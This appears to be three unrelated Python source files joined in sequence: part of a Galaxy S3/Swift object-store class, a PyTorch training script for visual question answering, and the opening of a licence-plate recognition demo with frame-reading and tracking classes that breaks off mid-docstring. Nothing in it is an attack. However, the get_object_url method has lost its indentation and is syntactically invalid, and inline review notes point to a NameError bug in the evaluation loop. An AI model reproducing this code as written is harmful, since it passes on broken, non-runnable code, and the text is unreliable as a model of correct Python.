        created first. Raises ObjectNotFound when the object is missing."""
        if create:
            self.create(obj, **kwargs)
        if self.exists(obj, **kwargs):
            rel_path = self._construct_path(obj, **kwargs)
            # Choose whether to use the dataset file itself or an alternate file
            if file_name:
                source_file = os.path.abspath(file_name)
                # Copy into cache
                cache_file = self._get_cache_path(rel_path)
                try:
                    if source_file != cache_file:
                        # FIXME? Should this be a `move`?
                        shutil.copy2(source_file, cache_file)
                    self._fix_permissions(cache_file)
                except OSError:
                    log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
            else:
                source_file = self._get_cache_path(rel_path)
            # Update the file on S3
            self._push_to_os(rel_path, source_file)
        else:
            raise ObjectNotFound( 'objectstore.update_from_file, object does not exist: %s, kwargs: %s'
                                  % ( str( obj ), str( kwargs ) ) )
def get_object_url(self, obj, **kwargs):
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
try:
key = Key(self.bucket, rel_path)
return key.generate_url(expires_in=86400) # 24hrs
except S3ResponseError:
log.exception("Trouble generating URL for dataset '%s'", rel_path)
return None
    def get_store_usage_percent(self):
        # S3 has no fixed capacity, so usage is always reported as 0%.
        return 0.0
class SwiftObjectStore(S3ObjectStore):
    """
    Object store that stores objects as items in a Swift bucket. A local
    cache exists that is used as an intermediate location for files between
    Galaxy and Swift.

    Identical to S3ObjectStore except for how the connection is opened:
    Swift needs explicit host/port/path and OrdinaryCallingFormat.
    """

    def _configure_connection(self):
        """Connect to Swift through boto's generic S3 interface using the
        host/port/path from the XML configuration."""
        log.debug("Configuring Swift Connection")
        self.conn = boto.connect_s3(aws_access_key_id=self.access_key,
                                    aws_secret_access_key=self.secret_key,
                                    is_secure=self.is_secure,
                                    host=self.host,
                                    port=self.port,
                                    calling_format=boto.s3.connection.OrdinaryCallingFormat(),
                                    path=self.conn_path)
|
train_vqa.py | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import h5py
import time
import argparse
import numpy as np
import os, sys, json
import torch
from torch.autograd import Variable
torch.backends.cudnn.enabled = False
import torch.multiprocessing as mp
from models import VqaLstmModel, VqaLstmCnnAttentionModel
from data import EqaDataset, EqaDataLoader
from metrics import VqaMetric
from models import get_state, repackage_hidden, ensure_shared_grads
from data import load_vocab
import pdb
def eval(rank, args, shared_model):
    """Evaluation worker: each epoch, sync weights from shared_model, score
    the eval split, and checkpoint whenever validation accuracy improves.

    NOTE(review): shadows the builtin ``eval``; a rename would be clearer.
    """
    torch.cuda.set_device(args.gpus.index(args.gpus[rank % len(args.gpus)]))
    # Build the model variant matching the requested input modality.
    if args.input_type == 'ques':
        model_kwargs = {'vocab': load_vocab(args.vocab_json)}
        model = VqaLstmModel(**model_kwargs)
    elif args.input_type == 'ques,image':
        model_kwargs = {'vocab': load_vocab(args.vocab_json)}
        model = VqaLstmCnnAttentionModel(**model_kwargs)
    lossFn = torch.nn.CrossEntropyLoss().cuda()
    eval_loader_kwargs = {
        'questions_h5': getattr(args, args.eval_split + '_h5'),
        'data_json': args.data_json,
        'vocab': args.vocab_json,
        'batch_size': 1,
        'input_type': args.input_type,
        'num_frames': args.num_frames,
        'split': args.eval_split,
        'max_threads_per_gpu': args.max_threads_per_gpu,
        'gpu_id': args.gpus[rank%len(args.gpus)],
        'to_cache': args.to_cache
    }
    eval_loader = EqaDataLoader(**eval_loader_kwargs)
    print('eval_loader has %d samples' % len(eval_loader.dataset))
    args.output_log_path = os.path.join(args.log_dir,
                                        'eval_' + str(rank) + '.json')
    t, epoch, best_eval_acc = 0, 0, 0
    while epoch < int(args.max_epochs):
        # Pull the latest shared weights before scoring this epoch.
        model.load_state_dict(shared_model.state_dict())
        model.eval()
        metrics = VqaMetric(
            info={'split': args.eval_split},
            metric_names=[
                'loss', 'accuracy', 'mean_rank', 'mean_reciprocal_rank'
            ],
            log_json=args.output_log_path)
        if args.input_type == 'ques':
            for batch in eval_loader:
                t += 1
                model.cuda()
                idx, questions, answers = batch
                questions_var = Variable(questions.cuda())
                answers_var = Variable(answers.cuda())
                scores = model(questions_var)
                loss = lossFn(scores, answers_var)
                # update metrics (loss.data[0] is the old pre-0.4 tensor API)
                accuracy, ranks = metrics.compute_ranks(
                    scores.data.cpu(), answers)
                metrics.update([loss.data[0], accuracy, ranks, 1.0 / ranks])
            print(metrics.get_stat_string(mode=0))
        elif args.input_type == 'ques,image':
            done = False
            # Environments are loaded in chunks; loop until all were scored.
            all_envs_loaded = eval_loader.dataset._check_if_all_envs_loaded()
            while done == False:
                for batch in eval_loader:
                    t += 1
                    model.cuda()
                    idx, questions, answers, images, _, _, _ = batch
                    questions_var = Variable(questions.cuda())
                    answers_var = Variable(answers.cuda())
                    images_var = Variable(images.cuda())
                    scores, att_probs = model(images_var, questions_var)
                    loss = lossFn(scores, answers_var)
                    # update metrics
                    accuracy, ranks = metrics.compute_ranks(
                        scores.data.cpu(), answers)
                    metrics.update(
                        [loss.data[0], accuracy, ranks, 1.0 / ranks])
                print(metrics.get_stat_string(mode=0))
                if all_envs_loaded == False:
                    eval_loader.dataset._load_envs()
                    if len(eval_loader.dataset.pruned_env_set) == 0:
                        done = True
                else:
                    done = True
        epoch += 1
        # checkpoint if best val accuracy
        if metrics.metrics[1][0] > best_eval_acc:
            best_eval_acc = metrics.metrics[1][0]
            if epoch % args.eval_every == 0 and args.to_log == 1:
                metrics.dump_log()
                model_state = get_state(model)
                if args.checkpoint_path != False:
                    # NOTE(review): `checkpoint` is read here before it is
                    # ever assigned in this function — on the first improved
                    # epoch this raises NameError unless a module-level
                    # `checkpoint` exists. Confirm and fix (likely should
                    # load args.checkpoint_path first).
                    ad = checkpoint['args']
                else:
                    ad = args.__dict__
                checkpoint = {'args': ad, 'state': model_state, 'epoch': epoch}
                checkpoint_path = '%s/epoch_%d_accuracy_%.04f.pt' % (
                    args.checkpoint_dir, epoch, best_eval_acc)
                print('Saving checkpoint to %s' % checkpoint_path)
                torch.save(checkpoint, checkpoint_path)
        print('[best_eval_accuracy:%.04f]' % best_eval_acc)
def train(rank, args, shared_model):
    """Worker-process entry point: train a local copy of the VQA model while
    optimizing the parameters of `shared_model` (Hogwild/A3C-style sharing).

    Args:
        rank: worker index (1-based when spawned from __main__); picks a GPU
            round-robin from args.gpus and names this worker's log file.
        args: argparse namespace (or the checkpoint-restored equivalent).
        shared_model: model living in shared memory. The optimizer below holds
            *its* parameters; the local `model` only produces gradients, which
            ensure_shared_grads() copies over before each optimizer step.

    NOTE: uses legacy (pre-0.4) PyTorch APIs — `Variable` wrappers and
    `loss.data[0]` — so this code targets old torch versions only.
    """
    # NOTE(review): args.gpus.index(...) equals rank % len(args.gpus) unless
    # args.gpus contains duplicate device ids.
    torch.cuda.set_device(args.gpus.index(args.gpus[rank % len(args.gpus)]))
    if args.input_type == 'ques':
        # Question-only model: LSTM over the question tokens.
        model_kwargs = {'vocab': load_vocab(args.vocab_json)}
        model = VqaLstmModel(**model_kwargs)
    elif args.input_type == 'ques,image':
        # Question + image frames with attention.
        model_kwargs = {'vocab': load_vocab(args.vocab_json)}
        model = VqaLstmCnnAttentionModel(**model_kwargs)
    lossFn = torch.nn.CrossEntropyLoss().cuda()
    # The optimizer updates the *shared* parameters, not the local copy's.
    optim = torch.optim.Adam(
        filter(lambda p: p.requires_grad, shared_model.parameters()),
        lr=args.learning_rate)
    train_loader_kwargs = {
        'questions_h5': args.train_h5,
        'data_json': args.data_json,
        'vocab': args.vocab_json,
        'batch_size': args.batch_size,
        'input_type': args.input_type,
        'num_frames': args.num_frames,
        'split': 'train',
        'max_threads_per_gpu': args.max_threads_per_gpu,
        'gpu_id': args.gpus[rank%len(args.gpus)],
        'to_cache': args.to_cache
    }
    # Per-worker JSON metrics log.
    args.output_log_path = os.path.join(args.log_dir,
                                        'train_' + str(rank) + '.json')
    metrics = VqaMetric(
        info={'split': 'train',
              'thread': rank},
        metric_names=['loss', 'accuracy', 'mean_rank', 'mean_reciprocal_rank'],
        log_json=args.output_log_path)
    train_loader = EqaDataLoader(**train_loader_kwargs)
    if args.input_type == 'ques,image':
        # Environments are loaded lazily in chunks; start with the first set.
        train_loader.dataset._load_envs(start_idx=0, in_order=True)
    print('train_loader has %d samples' % len(train_loader.dataset))
    t, epoch = 0, 0
    while epoch < int(args.max_epochs):
        if args.input_type == 'ques':
            for batch in train_loader:
                t += 1
                # Sync local weights from the shared model before each step.
                model.load_state_dict(shared_model.state_dict())
                model.train()
                model.cuda()
                idx, questions, answers = batch
                questions_var = Variable(questions.cuda())
                answers_var = Variable(answers.cuda())
                scores = model(questions_var)
                loss = lossFn(scores, answers_var)
                # zero grad
                optim.zero_grad()
                # update metrics
                accuracy, ranks = metrics.compute_ranks(scores.data.cpu(), answers)
                metrics.update([loss.data[0], accuracy, ranks, 1.0 / ranks])
                # backprop and update: grads are computed locally, copied to
                # the shared model (model is moved to cpu first), then stepped.
                loss.backward()
                ensure_shared_grads(model.cpu(), shared_model)
                optim.step()
                if t % args.print_every == 0:
                    print(metrics.get_stat_string())
                    if args.to_log == 1:
                        metrics.dump_log()
        elif args.input_type == 'ques,image':
            done = False
            all_envs_loaded = train_loader.dataset._check_if_all_envs_loaded()
            while done == False:
                for batch in train_loader:
                    t += 1
                    model.load_state_dict(shared_model.state_dict())
                    model.train()
                    model.cuda()
                    idx, questions, answers, images, _, _, _ = batch
                    questions_var = Variable(questions.cuda())
                    answers_var = Variable(answers.cuda())
                    images_var = Variable(images.cuda())
                    scores, att_probs = model(images_var, questions_var)
                    loss = lossFn(scores, answers_var)
                    # zero grad
                    optim.zero_grad()
                    # update metrics
                    accuracy, ranks = metrics.compute_ranks(scores.data.cpu(), answers)
                    metrics.update([loss.data[0], accuracy, ranks, 1.0 / ranks])
                    # backprop and update
                    loss.backward()
                    ensure_shared_grads(model.cpu(), shared_model)
                    optim.step()
                    if t % args.print_every == 0:
                        print(metrics.get_stat_string())
                        if args.to_log == 1:
                            metrics.dump_log()
                # Stream in the next chunk of environments until exhausted.
                if all_envs_loaded == False:
                    train_loader.dataset._load_envs(in_order=True)
                    if len(train_loader.dataset.pruned_env_set) == 0:
                        done = True
                else:
                    done = True
        epoch += 1
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    # data params
    parser.add_argument('-train_h5', default='data/train.h5')
    parser.add_argument('-val_h5', default='data/val.h5')
    parser.add_argument('-test_h5', default='data/test.h5')
    parser.add_argument('-data_json', default='data/data.json')
    parser.add_argument('-vocab_json', default='data/vocab.json')
    parser.add_argument('-train_cache_path', default=False)
    parser.add_argument('-val_cache_path', default=False)
    parser.add_argument('-mode', default='train', type=str, choices=['train','eval'])
    parser.add_argument('-eval_split', default='val', type=str)
    # model details
    parser.add_argument(
        '-input_type', default='ques,image', choices=['ques', 'ques,image'])
    parser.add_argument(
        '-num_frames', default=5,
        type=int)  # -1 = all frames of navigation sequence
    # optim params
    parser.add_argument('-batch_size', default=20, type=int)
    parser.add_argument('-learning_rate', default=3e-4, type=float)
    parser.add_argument('-max_epochs', default=1000, type=int)
    # bookkeeping
    parser.add_argument('-print_every', default=50, type=int)
    parser.add_argument('-eval_every', default=1, type=int)
    parser.add_argument('-identifier', default='q-only')
    parser.add_argument('-num_processes', default=1, type=int)
    parser.add_argument('-max_threads_per_gpu', default=10, type=int)
    # checkpointing
    parser.add_argument('-checkpoint_path', default=False)
    parser.add_argument('-checkpoint_dir', default='checkpoints/vqa/')
    parser.add_argument('-log_dir', default='logs/vqa/')
    parser.add_argument('-to_log', default=0, type=int)
    # NOTE(review): argparse pitfall — type=bool means any non-empty string
    # parses as True, so "-to_cache False" still yields True.
    parser.add_argument('-to_cache', default=True, type=bool)
    args = parser.parse_args()
    args.time_id = time.strftime("%m_%d_%H:%M")
    try:
        args.gpus = os.environ['CUDA_VISIBLE_DEVICES'].split(',')
        args.gpus = [int(x) for x in args.gpus]
    except KeyError:
        # GPU-only script: bail out when CUDA_VISIBLE_DEVICES is unset.
        print("CPU not supported")
        exit()
    if args.checkpoint_path != False:
        print('Loading checkpoint from %s' % args.checkpoint_path)
        args_to_keep = ['input_type', 'num_frames']
        checkpoint = torch.load(args.checkpoint_path, map_location={'cuda:0': 'cpu'})
        # Overwrite everything in the stored args except the model-defining
        # keys, so current CLI flags win for bookkeeping options.
        for i in args.__dict__:
            if i not in args_to_keep:
                checkpoint['args'][i] = args.__dict__[i]
        # NOTE(review): this builds a *class* whose class attributes are the
        # checkpoint args; attribute access (args.x) works the same as on a
        # Namespace, but args is no longer an argparse.Namespace instance.
        args = type('new_dict', (object, ), checkpoint['args'])
    args.checkpoint_dir = os.path.join(args.checkpoint_dir,
                                       args.time_id + '_' + args.identifier)
    args.log_dir = os.path.join(args.log_dir,
                                args.time_id + '_' + args.identifier)
    print(args.__dict__)
    if not os.path.exists(args.checkpoint_dir) and args.to_log == 1:
        os.makedirs(args.checkpoint_dir)
        os.makedirs(args.log_dir)
    if args.input_type == 'ques':
        model_kwargs = {'vocab': load_vocab(args.vocab_json)}
        shared_model = VqaLstmModel(**model_kwargs)
    elif args.input_type == 'ques,image':
        model_kwargs = {'vocab': load_vocab(args.vocab_json)}
        shared_model = VqaLstmCnnAttentionModel(**model_kwargs)
    if args.checkpoint_path != False:
        print('Loading params from checkpoint: %s' % args.checkpoint_path)
        shared_model.load_state_dict(checkpoint['state'])
    # Parameters are placed in shared memory so worker processes see updates.
    shared_model.share_memory()
    if args.mode == 'eval':
        # NOTE(review): `eval` here is this module's evaluation routine
        # (defined above), which shadows the Python builtin.
        eval(0, args, shared_model)
    else:
        processes = []
        # Start the eval thread
        p = mp.Process(target=eval, args=(0, args, shared_model))
        p.start()
        processes.append(p)
        # Start the training thread(s): ranks 1..num_processes (rank 0 is eval).
        for rank in range(1, args.num_processes + 1):
            p = mp.Process(target=train, args=(rank, args, shared_model))
            p.start()
            processes.append(p)
        for p in processes:
            p.join()
|
demo.py | import argparse
import os
import sys
import time
from dataclasses import dataclass
from PIL import Image, ImageChops, ImageDraw, ImageFont
from typing import List, Tuple, Iterator
import cv2
from PyQt5.QtCore import pyqtSignal, QThread, QObject
from PyQt5.QtWidgets import QApplication
import core as pr
import numpy as np
from queue import Queue
import re
import threading
import traceback
from sys import getsizeof as sizeof
from Util import ImageUtil, VideoUtil, ffmpegUtil, Serialization, editDistance, sec2str, Plate, getArgumentParser
class ReaderThread:
    """Background video-frame reader.

    Decouples potentially blocking frame grabs from the consumer by buffering
    frames in a queue. For RTSP sources the connection is re-opened on a read
    failure; for plain video files EOF terminates the thread.

    NOTE: relies on the module-global `args` for `args.memory_limit` (bytes).
    """
    def __init__(self, inStream: cv2.VideoCapture, rtsp: str):
        self._inStream: cv2.VideoCapture = inStream
        self._rtspAddress: str = rtsp
        self._queue: Queue = Queue()
        self._qsize: int = 0
        self._thread = threading.Thread(target=self._readFrame, name='read frame thread')
        self._itemMemory: int = 0  # bytes used by one queued frame (measured once)
        self.alive = False  # liveness flag of the reader thread
    def _readFrame(self):
        """Thread body: pull frames from the stream into the queue."""
        self.alive = True
        while self.alive:
            # Throttle while buffered frames exceed the memory budget.
            while len(self) > args.memory_limit:
                time.sleep(1)
            # Try to read one frame.
            try:
                frame = VideoUtil.ReadFrame(self._inStream)
                if frame.shape[0] == 0:
                    if 'rtsp' in self._rtspAddress:  # RTSP: rebuild the connection and retry
                        VideoUtil.CloseVideos(self._inStream)
                        time.sleep(1)
                        self._inStream = VideoUtil.OpenInputVideo(self._rtspAddress)
                        print('Readed rtsp failed! Reseting input stream...')
                        continue
                    else:  # regular video file: EOF, stop reading
                        break
            except:  # e.g. cv::OutOfMemoryError
                traceback.print_exc()
                self.alive = False
                return
            if self._itemMemory == 0:  # record the per-frame memory cost once
                self._itemMemory = sizeof(frame)
            self._queue.put(frame)
            self._qsize += 1
        self.alive = False
    def start(self):
        # NOTE(review): a threading.Thread can only be started once; after
        # stop() a new ReaderThread must be constructed to resume reading.
        if self.alive:
            raise RuntimeError("Reading thread is busy now, please call stop the thread first!")
        self._thread.start()
    def stop(self):
        self.alive = False
    def get(self, timeout=30):
        """Pop the next frame; raises queue.Empty after `timeout` seconds.

        Fix: decrement the counter only after a *successful* get. The old
        code decremented first, so a timeout corrupted the bookkeeping that
        __len__()/qsize() (and the memory throttle) depend on.
        """
        frame = self._queue.get(timeout=timeout)
        self._qsize -= 1
        return frame
    def qsize(self):
        return self._qsize
    def __len__(self):
        """
        Approximate memory footprint of the queued frames, in bytes.
        :return:
        """
        return max(0, self.qsize() * self._itemMemory)
class Tractor:
    """
    Simple tracker: refines, deduplicates and merges plate detection results.
    """
    def __init__(self, lifeTimeLimit=48):
        """
        Initialize the tracker.
        :param lifeTimeLimit: how many frames a plate may be unseen before it
            counts as having left the screen (larger = more accurate, slower)
        """
        # self.VehiclePlate = namedtuple('vehicle_plate', 'str confidence left right top bottom width height')
        self._movingPlates: List[Plate] = []   # plates currently on screen
        self._deadPlates: List[Plate] = []     # plates that have left the screen
        self._lifeTimeLimit = lifeTimeLimit    # lifetime (frames) of each plate
        self.multiTracker = CvMultiTracker()
    def VehiclePlate(self, *args) -> dict:
        """Build a plate-info dict from the 8 positional fields (or {} on arity mismatch)."""
        if len(args) != 8:
            return {}
        return {'plateStr': args[0], 'confidence': args[1], 'left': args[2], 'right': args[3], 'top': args[4],
                'bottom': args[5], 'width': args[6], 'height': args[7]}
    def _killMovingPlates(self, nowTime: int) -> None:
        """
        Move expired plates from movingPlates to deadPlates.
        Low-confidence ordinary plates (< 0.85, not special '厂内' ones) are
        simply dropped rather than archived.
        :param nowTime: current time (frame index)
        :return:
        """
        # NOTE(review): self._movingPlates is mutated while being iterated;
        # remove() during iteration can skip the element following a removal.
        for plate in self._movingPlates:
            if nowTime - plate.endTime > self._lifeTimeLimit:
                if plate.confidence >= 0.85 or '厂内' in plate.plateStr:
                    self._deadPlates.append(plate)
                self._movingPlates.remove(plate)
        # if not self._movingPlates:
        #     tmp,tmp2=copy.deepcopy(self._movingPlates),copy.deepcopy(self._deadPlates)
        ret = self.getAll()
        Main().getInstance().signals.showDataSignal.emit(ret)
        # self._movingPlates,self._deadPlates=tmp,tmp2
    def _getSimilarSavedPlates(self, nowPlateInfo: dict, nowTime: int) -> Iterator[Plate]:
        """
        Yield plates from movingPlates that are similar to the current one.
        :param nowPlateInfo: current plate dict (see self.VehiclePlate)
        :return: generator of similar Plate objects
        """
        def computeIntersect(rectangle1: List[float], rectangle2: List[float]):
            """
            Area of the intersection of two [left, right, top, bottom] rectangles.
            :param rectangle1:
            :param rectangle2:
            :return:
            """
            left1, right1, top1, bottom1 = rectangle1
            left2, right2, top2, bottom2 = rectangle2
            left = max(left1, left2)
            right = min(right1, right2)
            top = max(top1, top2)
            bottom = min(bottom1, bottom2)
            if left <= right and top <= bottom:
                return (right - left) * (bottom - top)
            return 0
        for i in range(len(self._movingPlates) - 1, -1, -1):
            savedPlate = self._movingPlates[i]  # stored plate
            _editDistance = editDistance(savedPlate.plateStr, nowPlateInfo['plateStr'])
            # Small edit distance + recently seen: similar without comparing boxes.
            if _editDistance < 4 and nowTime - savedPlate.endTime < self._lifeTimeLimit // 2:
                yield savedPlate
            elif _editDistance < 5:  # medium edit distance: require overlapping boxes
                rect1 = [savedPlate.left, savedPlate.right, savedPlate.top, savedPlate.bottom]
                rect2 = [nowPlateInfo['left'], nowPlateInfo['right'], nowPlateInfo['top'], nowPlateInfo['bottom']]
                if computeIntersect(rect1, rect2) != 0:
                    yield savedPlate
    def analyzePlate(self, nowPlateInfo: dict, nowTime: int) -> (str, float):
        """
        Analyze the current detection against stored plates and return the most
        likely plate string and its confidence.
        :param nowPlateInfo: current plate dict (see self.VehiclePlate)
        :param nowTime: current time (frame index)
        :return: (best plate string, confidence)
        """
        def getBetterPlate(beAssignedPlate: str, assignPlate: str) -> str:
            """
            Assignment helper that never lets a high-priority plate prefix be
            overwritten by a lower-priority one. Used instead of a plain
            `target = source` assignment.
            :param beAssignedPlate: plate string being overwritten
            :param assignPlate: plate string being assigned
            :return: the plate string that actually results
            """
            # Special plates always win; once seen, the special prefix sticks.
            specialPrefixes = ['厂内', 'SG', 'XL']
            # Province prefixes ordered by observed frequency, high to low.
            prefixes = ['粤', '湘', '豫', '川', '冀', '贵', '苏', '赣', '甘', '陕', '沪', '鲁', '黑', '辽', '皖', '鄂', '浙', '宁', '琼',
                        '闽', '蒙', '渝', '吉', '桂', '京', '新', '云']
            # Four cases: special-special, special-ordinary, ordinary-special, ordinary-ordinary.
            if beAssignedPlate[:2] in specialPrefixes:  # first is special: keep its prefix
                finalPrefixes = beAssignedPlate[:2]
                if assignPlate[:2] in specialPrefixes:  # body comes from the second plate
                    finalOthers = assignPlate[2:]
                else:
                    finalOthers = assignPlate[1:]
            else:  # first is not special
                if assignPlate[:2] in specialPrefixes:  # second is special
                    finalPrefixes = assignPlate[:2]
                    finalOthers = assignPlate[2:]
                else:
                    # Compare province-prefix priorities; unknown prefixes rank lowest.
                    priority1 = len(prefixes) - prefixes.index(beAssignedPlate[0]) if beAssignedPlate[
                        0] in prefixes else -1
                    priority2 = len(prefixes) - prefixes.index(assignPlate[0]) if assignPlate[0] in prefixes else -1
                    if priority1 <= priority2:
                        finalPrefixes = assignPlate[0]
                        finalOthers = assignPlate[1:]
                    else:
                        finalPrefixes = beAssignedPlate[0]
                        finalOthers = assignPlate[1:]
            # Special plates often produce a duplicated boundary character.
            return finalPrefixes + finalOthers if finalPrefixes[-1] != finalOthers[0] else finalPrefixes + finalOthers[
                1:]
        # Preprocessing:
        # If it matches the special-plate number pattern, rewrite it into the
        # canonical special-plate form.
        regexMatchesSpecialPlate = re.match(r'^.+?(2[1234][01]\d{2,}).*$', nowPlateInfo['plateStr'])
        if regexMatchesSpecialPlate:
            # '210', '211', '220', '221', '230', '240'
            nowPlateInfo['plateStr'] = '厂内' + regexMatchesSpecialPlate.group(1)[:5]
        # Skip: plate string too short.
        if len(nowPlateInfo['plateStr']) < 7:
            return nowPlateInfo['plateStr'], nowPlateInfo['confidence']
        # Skip: starts with an English letter (S and X excepted).
        if 'A' <= nowPlateInfo['plateStr'][0] <= 'R' or 'T' <= nowPlateInfo['plateStr'][0] <= 'W' or 'Y' <= \
                nowPlateInfo['plateStr'][
                    0] <= 'Z':
            return nowPlateInfo['plateStr'], nowPlateInfo['confidence']
        # Analysis: look for similar plates among the stored ones.
        similarPlates = list(self._getSimilarSavedPlates(nowPlateInfo, nowTime))
        if not similarPlates:  # none similar: insert as a new plate
            nowPlateInfo.update({'startTime': nowTime, 'endTime': nowTime})
            # (Heuristic) statistics show this holds ~95.9% of the time.
            if nowPlateInfo['plateStr'][1] == 'F' or nowPlateInfo['plateStr'][2] == 'F':
                nowPlateInfo['plateStr'] = '粤' + nowPlateInfo['plateStr'][nowPlateInfo['plateStr'].find('F'):]
            self._movingPlates.append(Plate(**nowPlateInfo))
            return self._movingPlates[-1].plateStr, nowPlateInfo['confidence']
        # Similar plates exist:
        self._killMovingPlates(nowTime)  # retire plates whose lifetime expired
        savedPlate = sorted(similarPlates, key=lambda plate: plate.confidence, reverse=True)[0]  # highest confidence
        if savedPlate.confidence < nowPlateInfo['confidence']:  # stored one is weaker: overwrite it
            # (Heuristic) never let a low-frequency prefix replace a high-frequency one.
            savedPlate.plateStr = getBetterPlate(savedPlate.plateStr, nowPlateInfo['plateStr'])
            # Copy the remaining fields and refresh endTime.
            savedPlate.confidence, savedPlate.left, savedPlate.right, savedPlate.top, savedPlate.bottom, \
            savedPlate.width, savedPlate.height, savedPlate.endTime = \
                nowPlateInfo['confidence'], nowPlateInfo['left'], nowPlateInfo['right'], nowPlateInfo['top'], \
                nowPlateInfo['bottom'], nowPlateInfo['width'], nowPlateInfo['height'], nowTime
            return nowPlateInfo['plateStr'], nowPlateInfo['confidence']
        else:  # stored one is stronger: only refresh endTime
            savedPlate.endTime = nowTime
            return savedPlate.plateStr, savedPlate.confidence
    def _purgeAndMerge(self, plateList: List[Plate], threshhold=4, ignoreTime=False) -> None:
        """Merge adjacent similar plates in `plateList`, in place."""
        if len(plateList) < 2:
            return
        plateList.sort(key=lambda plate: plate.startTime)  # identical plates become adjacent
        # Merge adjacent plates with small edit distance.
        for i in range(len(plateList) - 1, 0, -1):
            thisStr, previousStr = plateList[i], plateList[i - 1]
            if editDistance(thisStr.plateStr, previousStr.plateStr) < threshhold and (
                    ignoreTime or thisStr.startTime <= previousStr.endTime):
                endTime = max(thisStr.endTime, previousStr.endTime)
                if thisStr.confidence > previousStr.confidence:
                    # Keep the higher-confidence entry: widen its time span and
                    # swap it into the slot that survives the delete below.
                    thisStr.startTime = previousStr.startTime
                    thisStr.endTime = endTime
                    plateList[i], plateList[i - 1] = plateList[i - 1], plateList[i]
                else:
                    previousStr.endTime = endTime
                del plateList[i]
    def _mergeSamePlates(self) -> None:
        """
        Merge entries that represent the same physical plate.
        :return:
        """
        self._purgeAndMerge(self._deadPlates)
        self._purgeAndMerge(self._movingPlates)
    def getAll(self) -> List[Plate]:
        """
        Post-process and return all plates seen so far.
        :return:
        """
        self._mergeSamePlates()  # merge mis-recognized duplicates
        print('整理数据:大小从 %d ' % (len(self._deadPlates) + len(self._movingPlates)), end='')
        ans = sorted(self._deadPlates + self._movingPlates, key=lambda plate: plate.startTime)
        self._purgeAndMerge(ans, 1, True)  # merge exact duplicates
        print('到 %d' % (len(self._deadPlates) + len(self._movingPlates)))
        return ans
    def getInfoDictFromList(self, detectionList: List) -> dict:
        """
        Convert a raw detection list [str, confidence, (x, y, w, h)] into the
        dict produced by self.VehiclePlate.
        :param detectionList:
        :return:
        """
        x, y, width, height = detectionList.pop(2)
        detectionList += [x, x + width, y, y + height, width, height]
        return self.VehiclePlate(*detectionList)
    def serialization(self, binaryFilename=''):
        """Persist tracker state; keeps data only, to minimize file size."""
        if not binaryFilename:
            binaryFilename = time.strftime("%Y%m%d%H%M%S", time.localtime()) + '.tractor'
        binary = Serialization()
        binary.append(self._movingPlates)
        binary.append(self._deadPlates)
        binary.append(self._lifeTimeLimit)
        binary.append(self.multiTracker)
        binary.save(binaryFilename)
    def deserialization(self, binaryFilename: str):
        """Restore tracker state written by serialization()."""
        binary = Serialization()
        binary.load(binaryFilename)
        self._movingPlates = binary.popLoaded()
        # Fix: pop the stored list instead of assigning the Serialization
        # container itself (serialization() wrote four items in this order).
        self._deadPlates = binary.popLoaded()
        self._lifeTimeLimit = binary.popLoaded()
        self.multiTracker = binary.popLoaded()
class CvMultiTracker:
    """Manages a pool of OpenCV CSRT trackers with a miss-count lifetime policy.

    Each tracker owns a life counter; a failed update (or, optionally, a box
    that has not moved since the previous frame) costs one life, and a tracker
    is dropped when its counter reaches zero.
    """
    def __init__(self):
        self._trackers = []                        # active cv2 CSRT tracker objects
        self._lastNewRects: List[Tuple[float]] = []  # boxes returned by the previous update()
        self._lifeTimeLimit: List[int] = []        # remaining lives, parallel to _trackers
        self._lifeTimeLimitInit: int = 24          # initial life count for new trackers
    def isNewRectangle(self, rect: Tuple[float]) -> bool:
        """Return False when `rect` nearly coincides with a box from the last
        update; empty rects always count as new."""
        if not rect:
            return True
        candidate = np.array(rect)
        # "Nearly coincides" = per-component deviation has std <= 25 px.
        return all(np.std(np.array(previous) - candidate) > 25
                   for previous in self._lastNewRects)
    def appendTrackerCSRT(self, initImage: np.ndarray, initBox: List[float]) -> None:
        """Register a new CSRT tracker seeded with `initBox` on `initImage`.

        The box is inflated by 10% on every side before initialization.
        """
        if initImage is None or not initBox or len(initBox) != 4:
            return
        x, y, w, h = initBox
        initBox[0] = x - w * 0.1
        initBox[1] = y - h * 0.1
        initBox[2] = w * 1.2
        initBox[3] = h * 1.2
        tracker = cv2.TrackerCSRT_create()
        tracker.init(initImage, tuple(initBox))
        self._trackers.append(tracker)
        self._lifeTimeLimit.append(self._lifeTimeLimitInit)
    def update(self, image: np.ndarray, purgeMissedTracker=True) -> List[Tuple[float]]:
        """Advance every tracker with `image` and return the surviving boxes.

        A tracker loses one life when its update fails or — with
        purgeMissedTracker set — when its box is stationary relative to the
        previous call; it is removed once the counter hits zero.
        """
        assert len(self._trackers) == len(self._lifeTimeLimit)
        survivors = []
        doomed = []
        for idx, tracker in enumerate(self._trackers):
            ok, box = tracker.update(image)
            box = tuple(box)
            missed = (not ok) or (purgeMissedTracker and not self.isNewRectangle(box))
            if missed:
                self._lifeTimeLimit[idx] -= 1
                if self._lifeTimeLimit[idx] == 0:
                    doomed.append(idx)
                continue
            survivors.append(box)
        self._lastNewRects = survivors
        # Delete from the highest index down so earlier indices stay valid.
        for idx in sorted(doomed, reverse=True):
            self.purgeAt(idx)
        return self._lastNewRects
    def purgeAt(self, n: int) -> None:
        """Drop tracker `n` and its life counter; out-of-range is a no-op."""
        if not 0 <= n < len(self._trackers):
            return
        del self._trackers[n]
        del self._lifeTimeLimit[n]
    def reborn(self, n: int) -> None:
        """Reset tracker `n`'s life counter to the initial value."""
        if 0 <= n < len(self._trackers):
            self._lifeTimeLimit[n] = self._lifeTimeLimitInit
    def workingTrackerCount(self) -> int:
        """Number of trackers currently being updated."""
        return len(self._trackers)
class Signals(QObject):
    """
    Qt signals used to push data from the worker thread to the GUI.
    """
    # Raw frame as read from the source, before detection drawing.
    showRawFrameSignal = pyqtSignal(np.ndarray)
    # Frame with detection boxes/text drawn on it.
    showDetectionFrameSignal = pyqtSignal(np.ndarray)
    # Accumulated recognition results (list of Plate objects).
    showDataSignal = pyqtSignal(list)
    # Emitted once when the processing thread finishes.
    threadExitSignal = pyqtSignal()
class Main:
    """Singleton driving the whole detection pipeline (photos or video/RTSP).

    Heavy resources (font, LPR model, serializer, tracker) are created once as
